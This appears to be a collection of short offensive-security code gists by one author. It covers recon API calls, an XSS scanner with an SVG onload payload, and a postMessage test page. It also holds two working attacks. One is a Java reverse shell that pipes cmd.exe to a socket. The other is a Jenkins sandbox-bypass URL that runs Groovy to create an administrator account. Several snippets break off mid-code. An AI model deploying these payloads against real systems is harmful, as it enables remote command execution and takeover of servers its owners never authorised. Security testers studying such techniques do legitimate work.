akhil-reni

Search ASN number using organization name

curl -X GET "https://api.spyse.com/v2/data/as/search?limit=100&search_params=%7B%22as_org%22%3A%5B%7B%22operator%22%3A%22contains%22%2C%22value%22%3A%22Oath%20Holdings%20Inc.%22%7D%5D%7D" -H "accept: application/json" -H "Authorization: Bearer token"

Fetch domains using ASN

curl -X GET "https://api.spyse.com/v2/data/as/domain?limit=100&asn=10310" -H "accept: application/json" -H "Authorization: Bearer token"

akhil-reni

Index per scan

elasticdump \
    --input="./output.json" \
    --output="http://127.0.0.1:9200" \
    --output-index="subfinder" \
    --limit=10000 \
    --type=data \
 --transform="doc._source=Object.assign({},doc)"

akhil-reni

def payload_generator(context):
    payloads = []
    if context == 'attribname':
        payloads = []
        comb = {}

        # check for escaping < >
        comb['payload'] = "\"><svg onload=prompt`812132`>"
        comb['find'] = "//svg[@onload[contains(.,812132)]]"
        payloads.append(comb)

akhil-reni

from lxml import html
import re


class ContextAnalyzer:

    def __init__(self, response_text, search_string):
        self.get_contexts(response_text, search_string)

    @staticmethod

akhil-reni

import copy

class GetInsertionPoints:

    def __init__(self, request):
        self.request = request
        self.requests = []
        self.params(append=True)
        self.body(append=True)

akhil-reni

from __future__ import absolute_import, unicode_literals

from http.server import BaseHTTPRequestHandler
from io import BytesIO
from urllib import parse


class Request:
    def __init__(self):
        self.headers = None

akhil-reni

<html>
<script>
function bindEvent(element, eventName, eventHandler) {
            if (element.addEventListener){
                element.addEventListener(eventName, eventHandler, false);
            } else if (element.attachEvent) {
                element.attachEvent('on' + eventName, eventHandler);
            }
        }
        bindEvent(window, 'message', function (e) {

akhil-reni

import ipaddress
import fileinput


ips = []
for line in fileinput.input():
    try:
        ips.extend(list(ipaddress.ip_network(line.strip())))
    except:
        pass

akhil-reni

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

akhil-reni

http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}